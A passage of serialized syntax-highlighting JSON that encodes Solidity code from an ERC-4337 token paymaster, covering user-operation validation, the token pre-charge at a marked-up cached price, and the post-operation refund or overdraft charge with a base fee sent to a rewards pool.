",{"type":26,"tag":137,"props":105758,"children":105759},{"style":5590},[105760],{"type":32,"value":289},{"type":26,"tag":137,"props":105762,"children":105763},{"style":5601},[105764],{"type":32,"value":105765}," userOp.paymasterAndData.length ",{"type":26,"tag":137,"props":105767,"children":105768},{"style":5590},[105769],{"type":32,"value":6908},{"type":26,"tag":137,"props":105771,"children":105772},{"style":5601},[105773],{"type":32,"value":105774}," PAYMASTER_DATA_OFFSET;\n",{"type":26,"tag":137,"props":105776,"children":105777},{"class":5559,"line":6191},[105778,105783,105788,105792,105796,105800,105804,105808,105813,105817,105822],{"type":26,"tag":137,"props":105779,"children":105780},{"style":5610},[105781],{"type":32,"value":105782},"            require",{"type":26,"tag":137,"props":105784,"children":105785},{"style":5601},[105786],{"type":32,"value":105787},"(dataLength ",{"type":26,"tag":137,"props":105789,"children":105790},{"style":5590},[105791],{"type":32,"value":11161},{"type":26,"tag":137,"props":105793,"children":105794},{"style":5626},[105795],{"type":32,"value":5629},{"type":26,"tag":137,"props":105797,"children":105798},{"style":5590},[105799],{"type":32,"value":26288},{"type":26,"tag":137,"props":105801,"children":105802},{"style":5601},[105803],{"type":32,"value":105756},{"type":26,"tag":137,"props":105805,"children":105806},{"style":5590},[105807],{"type":32,"value":11161},{"type":26,"tag":137,"props":105809,"children":105810},{"style":5626},[105811],{"type":32,"value":105812}," 32",{"type":26,"tag":137,"props":105814,"children":105815},{"style":5601},[105816],{"type":32,"value":1108},{"type":26,"tag":137,"props":105818,"children":105819},{"style":6837},[105820],{"type":32,"value":105821},"\"TPM: invalid data length\"",{"type":26,"tag":137,"props":105823,"children":105824},{"style":5601},[105825],{"type":32,"value":6430},{"type":26,"tag":137,"props":105827,"children":105828},{"class":5559,"line":6208},[105829,105833,105838,105842,105847,105852],{"type":26,"tag":137,"props":105830,"children":105831},{"style":6009},[105832],{"type":32,"value":105709},{"type":26,"tag":137,"props":105834,"children":105835},{"style":5601},[105836],{"type":32,"value":105837}," maxFeePerGas ",{"type":26,"tag":137,"props":105839,"children":105840},{"style":5590},[105841],{"type":32,"value":289},{"type":26,"tag":137,"props":105843,"children":105844},{"style":5601},[105845],{"type":32,"value":105846}," userOp.",{"type":26,"tag":137,"props":105848,"children":105849},{"style":5682},[105850],{"type":32,"value":105851},"unpackMaxFeePerGas",{"type":26,"tag":137,"props":105853,"children":105854},{"style":5601},[105855],{"type":32,"value":6267},{"type":26,"tag":137,"props":105857,"children":105858},{"class":5559,"line":6225},[105859,105863,105868,105872],{"type":26,"tag":137,"props":105860,"children":105861},{"style":6009},[105862],{"type":32,"value":105709},{"type":26,"tag":137,"props":105864,"children":105865},{"style":5601},[105866],{"type":32,"value":105867}," refundPostopCost ",{"type":26,"tag":137,"props":105869,"children":105870},{"style":5590},[105871],{"type":32,"value":289},{"type":26,"tag":137,"props":105873,"children":105874},{"style":5601},[105875],{"type":32,"value":105876}," tokenPaymasterConfig.refundPostopCost;\n",{"type":26,"tag":137,"props":105878,"children":105879},{"class":5559,"line":6238},[105880,105884,105889,105893,105897,105902,105906,105911],{"type":26,"tag":137,"props":105881,"children":105882},{"style":5610},[105883],{"type":32,"value":105782},{"type":26,"tag":137,"props":105885,"children":105886},{"style":5601},[105887],{"type":32,"value":105888},"(refundPostopCost ",{"type":26,"tag":137,"props":105890,"children":105891},{"style":5590},[105892],{"type":32,"value":8391},{"type":26,"tag":137,"props":105894,"children":105895},{"style":5601},[105896],{"type":32,"value":105846},{"type":26,"tag":137,"props":105898,"children":105899},{"style":5682},[105900],{"type":32,"value":105901},"unpackPostOpGasLimit",{"type":26,"tag":137,"props":105903,"children":105904},{"style":5601},[105905],{"type":32,"value":20968},{"type":26,"tag":137,"props":105907,"children":105908},{"style":6837},[105909],{"type":32,"value":105910},"\"TPM: postOpGasLimit too low\"",{"type":26,"tag":137,"props":105912,"children":105913},{"style":5601},[105914],{"type":32,"value":6430},{"type":26,"tag":137,"props":105916,"children":105917},{"class":5559,"line":6247},[105918,105922,105927,105931,105936,105940,105945,105949],{"type":26,"tag":137,"props":105919,"children":105920},{"style":6009},[105921],{"type":32,"value":105709},{"type":26,"tag":137,"props":105923,"children":105924},{"style":5601},[105925],{"type":32,"value":105926}," preChargeNative ",{"type":26,"tag":137,"props":105928,"children":105929},{"style":5590},[105930],{"type":32,"value":289},{"type":26,"tag":137,"props":105932,"children":105933},{"style":5601},[105934],{"type":32,"value":105935}," requiredPreFund ",{"type":26,"tag":137,"props":105937,"children":105938},{"style":5590},[105939],{"type":32,"value":356},{"type":26,"tag":137,"props":105941,"children":105942},{"style":5601},[105943],{"type":32,"value":105944}," (refundPostopCost ",{"type":26,"tag":137,"props":105946,"children":105947},{"style":5590},[105948],{"type":32,"value":7152},{"type":26,"tag":137,"props":105950,"children":105951},{"style":5601},[105952],{"type":32,"value":105953}," maxFeePerGas);\n",{"type":26,"tag":137,"props":105955,"children":105956},{"class":5559,"line":6270},[105957,105962,105966],{"type":26,"tag":137,"props":105958,"children":105959},{"style":5564},[105960],{"type":32,"value":105961},"            // ",{"type":26,"tag":137,"props":105963,"children":105964},{"style":5573},[105965],{"type":32,"value":69360},{"type":26,"tag":137,"props":105967,"children":105968},{"style":5564},[105969],{"type":32,"value":105970},": price is in native-asset-per-token increasing it means dividing it by markup\n",{"type":26,"tag":137,"props":105972,"children":105973},{"class":5559,"line":6279},[105974,105978,105983,105987,105992,105996,106001,106005],{"type":26,"tag":137,"props":105975,"children":105976},{"style":6009},[105977],{"type":32,"value":105709},{"type":26,"tag":137,"props":105979,"children":105980},{"style":5601},[105981],{"type":32,"value":105982}," cachedPriceWithMarkup ",{"type":26,"tag":137,"props":105984,"children":105985},{"style":5590},[105986],{"type":32,"value":289},{"type":26,"tag":137,"props":105988,"children":105989},{"style":5601},[105990],{"type":32,"value":105991}," cachedPrice ",{"type":26,"tag":137,"props":105993,"children":105994},{"style":5590},[105995],{"type":32,"value":7152},{"type":26,"tag":137,"props":105997,"children":105998},{"style":5601},[105999],{"type":32,"value":106000}," DENOM ",{"type":26,"tag":137,"props":106002,"children":106003},{"style":5590},[106004],{"type":32,"value":7162},{"type":26,"tag":137,"props":106006,"children":106007},{"style":5601},[106008],{"type":32,"value":106009}," priceMarkup;\n",{"type":26,"tag":137,"props":106011,"children":106012},{"class":5559,"line":6288},[106013,106017,106022,106026,106030],{"type":26,"tag":137,"props":106014,"children":106015},{"style":5610},[106016],{"type":32,"value":61402},{"type":26,"tag":137,"props":106018,"children":106019},{"style":5601},[106020],{"type":32,"value":106021}," (dataLength ",{"type":26,"tag":137,"props":106023,"children":106024},{"style":5590},[106025],{"type":32,"value":11161},{"type":26,"tag":137,"props":106027,"children":106028},{"style":5626},[106029],{"type":32,"value":105812},{"type":26,"tag":137,"props":106031,"children":106032},{"style":5601},[106033],{"type":32,"value":17395},{"type":26,"tag":137,"props":106035,"children":106036},{"class":5559,"line":6355},[106037,106042,106047],{"type":26,"tag":137,"props":106038,"children":106039},{"style":6009},[106040],{"type":32,"value":106041},"                uint256",{"type":26,"tag":137,"props":106043,"children":106044},{"style":5601},[106045],{"type":32,"value":106046}," clientSuppliedPrice ",{"type":26,"tag":137,"props":106048,"children":106049},{"style":5590},[106050],{"type":32,"value":17284},{"type":26,"tag":137,"props":106052,"children":106053},{"class":5559,"line":6363},[106054,106059,106063,106067,106072,106076,106081,106085,106089],{"type":26,"tag":137,"props":106055,"children":106056},{"style":6009},[106057],{"type":32,"value":106058},"                    uint256",{"type":26,"tag":137,"props":106060,"children":106061},{"style":5601},[106062],{"type":32,"value":165},{"type":26,"tag":137,"props":106064,"children":106065},{"style":6009},[106066],{"type":32,"value":105607},{"type":26,"tag":137,"props":106068,"children":106069},{"style":5601},[106070],{"type":32,"value":106071},"(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET",{"type":26,"tag":137,"props":106073,"children":106074},{"style":5590},[106075],{"type":32,"value":7072},{"type":26,"tag":137,"props":106077,"children":106078},{"style":5601},[106079],{"type":32,"value":106080},"PAYMASTER_DATA_OFFSET ",{"type":26,"tag":137,"props":106082,"children":106083},{"style":5590},[106084],{"type":32,"value":356},{"type":26,"tag":137,"props":106086,"children":106087},{"style":5626},[106088],{"type":32,"value":105812},{"type":26,"tag":137,"props":106090,"children":106091},{"style":5601},[106092],{"type":32,"value":106093},"]));\n",{"type":26,"tag":137,"props":106095,"children":106096},{"class":5559,"line":6393},[106097,106102,106107,106111],{"type":26,"tag":137,"props":106098,"children":106099},{"style":5610},[106100],{"type":32,"value":106101},"                if",{"type":26,"tag":137,"props":106103,"children":106104},{"style":5601},[106105],{"type":32,"value":106106}," (clientSuppliedPrice ",{"type":26,"tag":137,"props":106108,"children":106109},{"style":5590},[106110],{"type":32,"value":8391},{"type":26,"tag":137,"props":106112,"children":106113},{"style":5601},[106114],{"type":32,"value":106115}," cachedPriceWithMarkup) {\n",{"type":26,"tag":137,"props":106117,"children":106118},{"class":5559,"line":6401},[106119,106124,106128],{"type":26,"tag":137,"props":106120,"children":106121},{"style":5564},[106122],{"type":32,"value":106123},"                    // ",{"type":26,"tag":137,"props":106125,"children":106126},{"style":5573},[106127],{"type":32,"value":69360},{"type":26,"tag":137,"props":106129,"children":106130},{"style":5564},[106131],{"type":32,"value":106132},": smaller number means 'more native asset per token'\n",{"type":26,"tag":137,"props":106134,"children":106135},{"class":5559,"line":6433},[106136,106141,106145],{"type":26,"tag":137,"props":106137,"children":106138},{"style":5601},[106139],{"type":32,"value":106140},"                    cachedPriceWithMarkup ",{"type":26,"tag":137,"props":106142,"children":106143},{"style":5590},[106144],{"type":32,"value":289},{"type":26,"tag":137,"props":106146,"children":106147},{"style":5601},[106148],{"type":32,"value":106149}," clientSuppliedPrice;\n",{"type":26,"tag":137,"props":106151,"children":106152},{"class":5559,"line":6441},[106153],{"type":26,"tag":137,"props":106154,"children":106155},{"style":5601},[106156],{"type":32,"value":73672},{"type":26,"tag":137,"props":106158,"children":106159},{"class":5559,"line":6501},[106160],{"type":26,"tag":137,"props":106161,"children":106162},{"style":5601},[106163],{"type":32,"value":61486},{"type":26,"tag":137,"props":106165,"children":106166},{"class":5559,"line":11634},[106167,106171,106176,106180,106185],{"type":26,"tag":137,"props":106168,"children":106169},{"style":6009},[106170],{"type":32,"value":105709},{"type":26,"tag":137,"props":106172,"children":106173},{"style":5601},[106174],{"type":32,"value":106175}," tokenAmount ",{"type":26,"tag":137,"props":106177,"children":106178},{"style":5590},[106179],{"type":32,"value":289},{"type":26,"tag":137,"props":106181,"children":106182},{"style":5682},[106183],{"type":32,"value":106184}," weiToToken",{"type":26,"tag":137,"props":106186,"children":106187},{"style":5601},[106188],{"type":32,"value":106189},"(preChargeNative, cachedPriceWithMarkup);\n",{"type":26,"tag":137,"props":106191,"children":106192},{"class":5559,"line":11652},[106193,106198,106202],{"type":26,"tag":137,"props":106194,"children":106195},{"style":5601},[106196],{"type":32,"value":106197},"            tokenAmount ",{"type":26,"tag":137,"props":106199,"children":106200},{"style":5590},[106201],{"type":32,"value":71039},{"type":26,"tag":137,"props":106203,"children":106204},{"style":5601},[106205],{"type":32,"value":106206}," baseFee;\n",{"type":26,"tag":137,"props":106208,"children":106209},{"class":5559,"line":11697},[106210,106215,106220,106225,106229,106233,106237],{"type":26,"tag":137,"props":106211,"children":106212},{"style":5601},[106213],{"type":32,"value":106214},"            SafeERC20.",{"type":26,"tag":137,"props":106216,"children":106217},{"style":5682},[106218],{"type":32,"value":106219},"safeTransferFrom",{"type":26,"tag":137,"props":106221,"children":106222},{"style":5601},[106223],{"type":32,"value":106224},"(token, userOp.sender, ",{"type":26,"tag":137,"props":106226,"children":106227},{"style":6009},[106228],{"type":32,"value":35236},{"type":26,"tag":137,"props":106230,"children":106231},{"style":5601},[106232],{"type":32,"value":165},{"type":26,"tag":137,"props":106234,"children":106235},{"style":5573},[106236],{"type":32,"value":20285},{"type":26,"tag":137,"props":106238,"children":106239},{"style":5601},[106240],{"type":32,"value":106241},"), tokenAmount);\n",{"type":26,"tag":137,"props":106243,"children":106244},{"class":5559,"line":11803},[106245,106250,106254,106259,106263,106268],{"type":26,"tag":137,"props":106246,"children":106247},{"style":5601},[106248],{"type":32,"value":106249},"            context ",{"type":26,"tag":137,"props":106251,"children":106252},{"style":5590},[106253],{"type":32,"value":289},{"type":26,"tag":137,"props":106255,"children":106256},{"style":5573},[106257],{"type":32,"value":106258}," abi",{"type":26,"tag":137,"props":106260,"children":106261},{"style":5601},[106262],{"type":32,"value":470},{"type":26,"tag":137,"props":106264,"children":106265},{"style":5682},[106266],{"type":32,"value":106267},"encode",{"type":26,"tag":137,"props":106269,"children":106270},{"style":5601},[106271],{"type":32,"value":106272},"(tokenAmount, userOp.sender);\n",{"type":26,"tag":137,"props":106274,"children":106275},{"class":5559,"line":26089},[106276,106281],{"type":26,"tag":137,"props":106277,"children":106278},{"style":5601},[106279],{"type":32,"value":106280},"            validationResult ",{"type":26,"tag":137,"props":106282,"children":106283},{"style":5590},[106284],{"type":32,"value":17284},{"type":26,"tag":137,"props":106286,"children":106287},{"class":5559,"line":26124},[106288,106293,106297,106301,106305,106310,106315,106319,106324,106328],{"type":26,"tag":137,"props":106289,"children":106290},{"style":5682},[106291],{"type":32,"value":106292},"                _packValidationData",{"type":26,"tag":137,"props":106294,"children":106295},{"style":5601},[106296],{"type":32,"value":165},{"type":26,"tag":137,"props":106298,"children":106299},{"style":5573},[106300],{"type":32,"value":10760},{"type":26,"tag":137,"props":106302,"children":106303},{"style":5601},[106304],{"type":32,"value":1108},{"type":26,"tag":137,"props":106306,"children":106307},{"style":6009},[106308],{"type":32,"value":106309},"uint48",{"type":26,"tag":137,"props":106311,"children":106312},{"style":5601},[106313],{"type":32,"value":106314},"(cachedPriceTimestamp ",{"type":26,"tag":137,"props":106316,"children":106317},{"style":5590},[106318],{"type":32,"value":356},{"type":26,"tag":137,"props":106320,"children":106321},{"style":5601},[106322],{"type":32,"value":106323}," tokenPaymasterConfig.priceMaxAge), ",{"type":26,"tag":137,"props":106325,"children":106326},{"style":5626},[106327],{"type":32,"value":1817},{"type":26,"tag":137,"props":106329,"children":106330},{"style":5601},[106331],{"type":32,"value":6430},{"type":26,"tag":137,"props":106333,"children":106334},{"class":5559,"line":26132},[106335],{"type":26,"tag":137,"props":106336,"children":106337},{"style":5601},[106338],{"type":32,"value":5936},{"type":26,"tag":137,"props":106340,"children":106341},{"class":5559,"line":26140},[106342],{"type":26,"tag":137,"props":106343,"children":106344},{"style":5601},[106345],{"type":32,"value":5945},{"type":26,"tag":137,"props":106347,"children":106348},{"class":5559,"line":26149},[106349],{"type":26,"tag":137,"props":106350,"children":106351},{"style":5601},[106352],{"type":32,"value":12908},{"type":26,"tag":137,"props":106354,"children":106355},{"class":5559,"line":26191},[106356,106360,106365,106369,106374,106378,106382,106386,106390,106394,106398,106403,106407,106411,106416],{"type":26,"tag":137,"props":106357,"children":106358},{"style":5573},[106359],{"type":32,"value":92433},{"type":26,"tag":137,"props":106361,"children":106362},{"style":5682},[106363],{"type":32,"value":106364}," _postOp",{"type":26,"tag":137,"props":106366,"children":106367},{"style":5601},[106368],{"type":32,"value":165},{"type":26,"tag":137,"props":106370,"children":106371},{"style":5573},[106372],{"type":32,"value":106373},"PostOpMode",{"type":26,"tag":137,"props":106375,"children":106376},{"style":5601},[106377],{"type":32,"value":1108},{"type":26,"tag":137,"props":106379,"children":106380},{"style":6009},[106381],{"type":32,"value":86430},{"type":26,"tag":137,"props":106383,"children":106384},{"style":5573},[106385],{"type":32,"value":105593},{"type":26,"tag":137,"props":106387,"children":106388},{"style":5584},[106389],{"type":32,"value":78943},{"type":26,"tag":137,"props":106391,"children":106392},{"style":5601},[106393],{"type":32,"value":1108},{"type":26,"tag":137,"props":106395,"children":106396},{"style":6009},[106397],{"type":32,"value":48770},{"type":26,"tag":137,"props":106399,"children":106400},{"style":5584},[106401],{"type":32,"value":106402}," actualGasCost",{"type":26,"tag":137,"props":106404,"children":106405},{"style":5601},[106406],{"type":32,"value":1108},{"type":26,"tag":137,"props":106408,"children":106409},{"style":6009},[106410],{"type":32,"value":48770},{"type":26,"tag":137,"props":106412,"children":106413},{"style":5584},[106414],{"type":32,"value":106415}," actualUserOpFeePerGas",{"type":26,"tag":137,"props":106417,"children":106418},{"style":5601},[106419],{"type":32,"value":5742},{"type":26,"tag":137,"props":106421,"children":106422},{"class":5559,"line":26224},[106423],{"type":26,"tag":137,"props":106424,"children":106425},{"style":5573},[106426],{"type":32,"value":105632},{"type":26,"tag":137,"props":106428,"children":106429},{"class":5559,"line":26232},[106430],{"type":26,"tag":137,"props":106431,"children":106432},{"style":5573},[106433],{"type":32,"value":105640},{"type":26,"tag":137,"props":106435,"children":106436},{"class":5559,"line":26240},[106437],{"type":26,"tag":137,"props":106438,"children":106439},{"style":5601},[106440],{"type":32,"value":31781},{"type":26,"tag":137,"props":106442,"children":106443},{"class":5559,"line":26249},[106444,106448],{"type":26,"tag":137,"props":106445,"children":106446},{"style":5610},[106447],{"type":32,"value":105697},{"type":26,"tag":137,"props":106449,"children":106450},{"style":5601},[106451],{"type":32,"value":5875},{"type":26,"tag":137,"props":106453,"children":106454},{"class":5559,"line":26325},[106455,106459,106463,106467],{"type":26,"tag":137,"props":106456,"children":106457},{"style":6009},[106458],{"type":32,"value":105709},{"type":26,"tag":137,"props":106460,"children":106461},{"style":5601},[106462],{"type":32,"value":105714},{"type":26,"tag":137,"props":106464,"children":106465},{"style":5590},[106466],{"type":32,"value":289},{"type":26,"tag":137,"props":106468,"children":106469},{"style":5601},[106470],{"type":32,"value":105723},{"type":26,"tag":137,"props":106472,"children":106473},{"class":5559,"line":26358},[106474,106478,106482,106486],{"type":26,"tag":137,"props":106475,"children":106476},{"style":6009},[106477],{"type":32,"value":105709},{"type":26,"tag":137,"props":106479,"children":106480},{"style":5601},[106481],{"type":32,"value":105735},{"type":26,"tag":137,"props":106483,"children":106484},{"style":5590},[106485],{"type":32,"value":289},{"type":26,"tag":137,"props":106487,"children":106488},{"style":5601},[106489],{"type":32,"value":105744},{"type":26,"tag":137,"props":106491,"children":106492},{"class":5559,"line":26366},[106493,106498,106502,106507,106511,106516,106520,106524,106528,106533,106538,106542,106546,106550],{"type":26,"tag":137,"props":106494,"children":106495},{"style":5601},[106496],{"type":32,"value":106497},"            (",{"type":26,"tag":137,"props":106499,"children":106500},{"style":6009},[106501],{"type":32,"value":48770},{"type":26,"tag":137,"props":106503,"children":106504},{"style":5601},[106505],{"type":32,"value":106506}," preCharge, ",{"type":26,"tag":137,"props":106508,"children":106509},{"style":6009},[106510],{"type":32,"value":35236},{"type":26,"tag":137,"props":106512,"children":106513},{"style":5601},[106514],{"type":32,"value":106515}," userOpSender) ",{"type":26,"tag":137,"props":106517,"children":106518},{"style":5590},[106519],{"type":32,"value":289},{"type":26,"tag":137,"props":106521,"children":106522},{"style":5573},[106523],{"type":32,"value":106258},{"type":26,"tag":137,"props":106525,"children":106526},{"style":5601},[106527],{"type":32,"value":470},{"type":26,"tag":137,"props":106529,"children":106530},{"style":5682},[106531],{"type":32,"value":106532},"decode",{"type":26,"tag":137,"props":106534,"children":106535},{"style":5601},[106536],{"type":32,"value":106537},"(context, (",{"type":26,"tag":137,"props":106539,"children":106540},{"style":6009},[106541],{"type":32,"value":48770},{"type":26,"tag":137,"props":106543,"children":106544},{"style":5601},[106545],{"type":32,"value":1108},{"type":26,"tag":137,"props":106547,"children":106548},{"style":6009},[106549],{"type":32,"value":35236},{"type":26,"tag":137,"props":106551,"children":106552},{"style":5601},[106553],{"type":32,"value":9807},{"type":26,"tag":137,"props":106555,"children":106556},{"class":5559,"line":26374},[106557,106562,106567,106572],{"type":26,"tag":137,"props":106558,"children":106559},{"style":5601},[106560],{"type":32,"value":106561},"            preCharge ",{"type":26,"tag":137,"props":106563,"children":106564},{"style":5590},[106565],{"type":32,"value":106566},"-=",{"type":26,"tag":137,"props":106568,"children":106569},{"style":5601},[106570],{"type":32,"value":106571}," baseFee; ",{"type":26,"tag":137,"props":106573,"children":106574},{"style":5564},[106575],{"type":32,"value":106576},"// don't refund the base fee\n",{"type":26,"tag":137,"props":106578,"children":106579},{"class":5559,"line":26411},[106580,106584,106589,106593,106598,106602,106606],{"type":26,"tag":137,"props":106581,"children":106582},{"style":6009},[106583],{"type":32,"value":105709},{"type":26,"tag":137,"props":106585,"children":106586},{"style":5601},[106587],{"type":32,"value":106588}," _cachedPrice ",{"type":26,"tag":137,"props":106590,"children":106591},{"style":5590},[106592],{"type":32,"value":289},{"type":26,"tag":137,"props":106594,"children":106595},{"style":5682},[106596],{"type":32,"value":106597}," updateCachedPrice",{"type":26,"tag":137,"props":106599,"children":106600},{"style":5601},[106601],{"type":32,"value":165},{"type":26,"tag":137,"props":106603,"children":106604},{"style":5573},[106605],{"type":32,"value":10760},{"type":26,"tag":137,"props":106607,"children":106608},{"style":5601},[106609],{"type":32,"value":6430},{"type":26,"tag":137,"props":106611,"children":106612},{"class":5559,"line":26424},[106613,106617,106621],{"type":26,"tag":137,"props":106614,"children":106615},{"style":5564},[106616],{"type":32,"value":105961},{"type":26,"tag":137,"props":106618,"children":106619},{"style":5573},[106620],{"type":32,"value":69360},{"type":26,"tag":137,"props":106622,"children":106623},{"style":5564},[106624],{"type":32,"value":105970},{"type":26,"tag":137,"props":106626,"children":106627},{"class":5559,"line":26437},[106628,106632,106636,106640,106644,106648,106652,106656],{"type":26,"tag":137,"props":106629,"children":106630},{"style":6009},[106631],{"type":32,"value":105709},{"type":26,"tag":137,"props":106633,"children":106634},{"style":5601},[106635],{"type":32,"value":105982},{"type":26,"tag":137,"props":106637,"children":106638},{"style":5590},[106639],{"type":32,"value":289},{"type":26,"tag":137,"props":106641,"children":106642},{"style":5601},[106643],{"type":32,"value":106588},{"type":26,"tag":137,"props":106645,"children":106646},{"style":5590},[106647],{"type":32,"value":7152},{"type":26,"tag":137,"props":106649,"children":106650},{"style":5601},[106651],{"type":32,"value":106000},{"type":26,"tag":137,"props":106653,"children":106654},{"style":5590},[106655],{"type":32,"value":7162},{"type":26,"tag":137,"props":106657,"children":106658},{"style":5601},[106659],{"type":32,"value":106009},{"type":26,"tag":137,"props":106661,"children":106662},{"class":5559,"line":26450},[106663],{"type":26,"tag":137,"props":106664,"children":106665},{"style":5564},[106666],{"type":32,"value":106667},"            // Refund tokens based on actual gas cost\n",{"type":26,"tag":137,"props":106669,"children":106670},{"class":5559,"line":26504},[106671,106675,106680,106684,106689,106693,106698,106702],{"type":26,"tag":137,"props":106672,"children":106673},{"style":6009},[106674],{"type":32,"value":105709},{"type":26,"tag":137,"props":106676,"children":106677},{"style":5601},[106678],{"type":32,"value":106679}," actualChargeNative ",{"type":26,"tag":137,"props":106681,"children":106682},{"style":5590},[106683],{"type":32,"value":289},{"type":26,"tag":137,"props":106685,"children":106686},{"style":5601},[106687],{"type":32,"value":106688}," actualGasCost ",{"type":26,"tag":137,"props":106690,"children":106691},{"style":5590},[106692],{"type":32,"value":356},{"type":26,"tag":137,"props":106694,"children":106695},{"style":5601},[106696],{"type":32,"value":106697}," tokenPaymasterConfig.refundPostopCost ",{"type":26,"tag":137,"props":106699,"children":106700},{"style":5590},[106701],{"type":32,"value":7152},{"type":26,"tag":137,"props":106703,"children":106704},{"style":5601},[106705],{"type":32,"value":106706}," actualUserOpFeePerGas;\n",{"type":26,"tag":137,"props":106708,"children":106709},{"class":5559,"line":26513},[106710,106714,106719,106723,106727],{"type":26,"tag":137,"props":106711,"children":106712},{"style":6009},[106713],{"type":32,"value":105709},{"type":26,"tag":137,"props":106715,"children":106716},{"style":5601},[106717],{"type":32,"value":106718}," actualTokenNeeded ",{"type":26,"tag":137,"props":106720,"children":106721},{"style":5590},[106722],{"type":32,"value":289},{"type":26,"tag":137,"props":106724,"children":106725},{"style":5682},[106726],{"type":32,"value":106184},{"type":26,"tag":137,"props":106728,"children":106729},{"style":5601},[106730],{"type":32,"value":106731},"(actualChargeNative, cachedPriceWithMarkup);\n",{"type":26,"tag":137,"props":106733,"children":106734},{"class":5559,"line":34876},[106735,106739,106744,106748],{"type":26,"tag":137,"props":106736,"children":106737},{"style":5610},[106738],{"type":32,"value":61402},{"type":26,"tag":137,"props":106740,"children":106741},{"style":5601},[106742],{"type":32,"value":106743}," (preCharge ",{"type":26,"tag":137,"props":106745,"children":106746},{"style":5590},[106747],{"type":32,"value":13052},{"type":26,"tag":137,"props":106749,"children":106750},{"style":5601},[106751],{"type":32,"value":106752}," actualTokenNeeded) {\n",{"type":26,"tag":137,"props":106754,"children":106755},{"class":5559,"line":34897},[106756],{"type":26,"tag":137,"props":106757,"children":106758},{"style":5564},[106759],{"type":32,"value":106760},"                // If initially provided token amount is greater than the actual amount needed, refund the difference\n",{"type":26,"tag":137,"props":106762,"children":106763},{"class":5559,"line":83553},[106764,106769,106774,106779,106783],{"type":26,"tag":137,"props":106765,"children":106766},{"style":5601},[106767],{"type":32,"value":106768},"                SafeERC20.",{"type":26,"tag":137,"props":106770,"children":106771},{"style":5682},[106772],{"type":32,"value":106773},"safeTransfer",{"type":26,"tag":137,"props":106775,"children":106776},{"style":5601},[106777],{"type":32,"value":106778},"(token, userOpSender, preCharge ",{"type":26,"tag":137,"props":106780,"children":106781},{"style":5590},[106782],{"type":32,"value":6908},{"type":26,"tag":137,"props":106784,"children":106785},{"style":5601},[106786],{"type":32,"value":106787}," actualTokenNeeded);\n",{"type":26,"tag":137,"props":106789,"children":106790},{"class":5559,"line":83566},[106791,106795,106799,106803,106807,106811],{"type":26,"tag":137,"props":106792,"children":106793},{"style":5601},[106794],{"type":32,"value":73195},{"type":26,"tag":137,"props":106796,"children":106797},{"style":5610},[106798],{"type":32,"value":5902},{"type":26,"tag":137,"props":106800,"children":106801},{"style":5610},[106802],{"type":32,"value":18380},{"type":26,"tag":137,"props":106804,"children":106805},{"style":5601},[106806],{"type":32,"value":106743},{"type":26,"tag":137,"props":106808,"children":106809},{"style":5590},[106810],{"type":32,"value":8391},{"type":26,"tag":137,"props":106812,"children":106813},{"style":5601},[106814],{"type":32,"value":106752},{"type":26,"tag":137,"props":106816,"children":106817},{"class":5559,"line":83574},[106818],{"type":26,"tag":137,"props":106819,"children":106820},{"style":5564},[106821],{"type":32,"value":106822},"                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n",{"type":26,"tag":137,"props":106824,"children":106825},{"class":5559,"line":83582},[106826],{"type":26,"tag":137,"props":106827,"children":106828},{"style":5564},[106829],{"type":32,"value":106830},"                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n",{"type":26,"tag":137,"props":106832,"children":106833},{"class":5559,"line":83590},[106834,106838,106842,106847,106851,106855,106859,106864,106868],{"type":26,"tag":137,"props":106835,"children":106836},{"style":5601},[106837],{"type":32,"value":106768},{"type":26,"tag":137,"props":106839,"children":106840},{"style":5682},[106841],{"type":32,"value":106219},{"type":26,"tag":137,"props":106843,"children":106844},{"style":5601},[106845],{"type":32,"value":106846},"(token, userOpSender, ",{"type":26,"tag":137,"props":106848,"children":106849},{"style":6009},[106850],{"type":32,"value":35236},{"type":26,"tag":137,"props":106852,"children":106853},{"style":5601},[106854],{"type":32,"value":165},{"type":26,"tag":137,"props":106856,"children":106857},{"style":5573},[106858],{"type":32,"value":20285},{"type":26,"tag":137,"props":106860,"children":106861},{"style":5601},[106862],{"type":32,"value":106863},"), actualTokenNeeded ",{"type":26,"tag":137,"props":106865,"children":106866},{"style":5590},[106867],{"type":32,"value":6908},{"type":26,"tag":137,"props":106869,"children":106870},{"style":5601},[106871],{"type":32,"value":106872}," preCharge);\n",{"type":26,"tag":137,"props":106874,"children":106875},{"class":5559,"line":83630},[106876],{"type":26,"tag":137,"props":106877,"children":106878},{"style":5601},[106879],{"type":32,"value":61486},{"type":26,"tag":137,"props":106881,"children":106882},{"class":5559,"line":83638},[106883],{"type":26,"tag":137,"props":106884,"children":106885},{"emptyLinePlaceholder":18},[106886],{"type":32,"value":6276},{"type":26,"tag":137,"props":106888,"children":106889},{"class":5559,"line":90825},[106890,106894,106899,106903,106907],{"type":26,"tag":137,"props":106891,"children":106892},{"style":5610},[106893],{"type":32,"value":61402},{"type":26,"tag":137,"props":106895,"children":106896},{"style":5601},[106897],{"type":32,"value":106898}," (baseFee ",{"type":26,"tag":137,"props":106900,"children":106901},{"style":5590},[106902],{"type":32,"value":13052},{"type":26,"tag":137,"props":106904,"children":106905},{"style":5626},[106906],{"type":32,"value":5629},{"type":26,"tag":137,"props":106908,"children":106909},{"style":5601},[106910],{"type":32,"value":17395},{"type":26,"tag":137,"props":106912,"children":106913},{"class":5559,"line":90833},[106914,106918,106922],{"type":26,"tag":137,"props":106915,"children":106916},{"style":5601},[106917],{"type":32,"value":106768},{"type":26,"tag":137,"props":106919,"children":106920},{"style":5682},[106921],{"type":32,"value":106773},{"type":26,"tag":137,"props":106923,"children":106924},{"style":5601},[106925],{"type":32,"value":106926},"(token, tokenPaymasterConfig.rewardsPool, baseFee);\n",{"type":26,"tag":137,"props":106928,"children":106929},{"class":5559,"line":104158},[106930],{"type":26,"tag":137,"props":106931,"children":106932},{"style":5601},[106933],{"type":32,"value":61486},{"type":26,"tag":137,"props":106935,"children":106936},{"class":5559,"line":104166},[106937],{"type":26,"tag":137,"props":106938,"children":106939},{"emptyLinePlaceholder":18},[106940],{"type":32,"value":6276},{"type":26,"tag":137,"props":106942,"children":106943},{"class":5559,"line":104174},[106944,106949,106954],{"type":26,"tag":137,"props":106945,"children":106946},{"style":5610},[106947],{"type":32,"value":106948},"            emit",{"type":26,"tag":137,"props":106950,"children":106951},{"style":5682},[106952],{"type":32,"value":106953}," 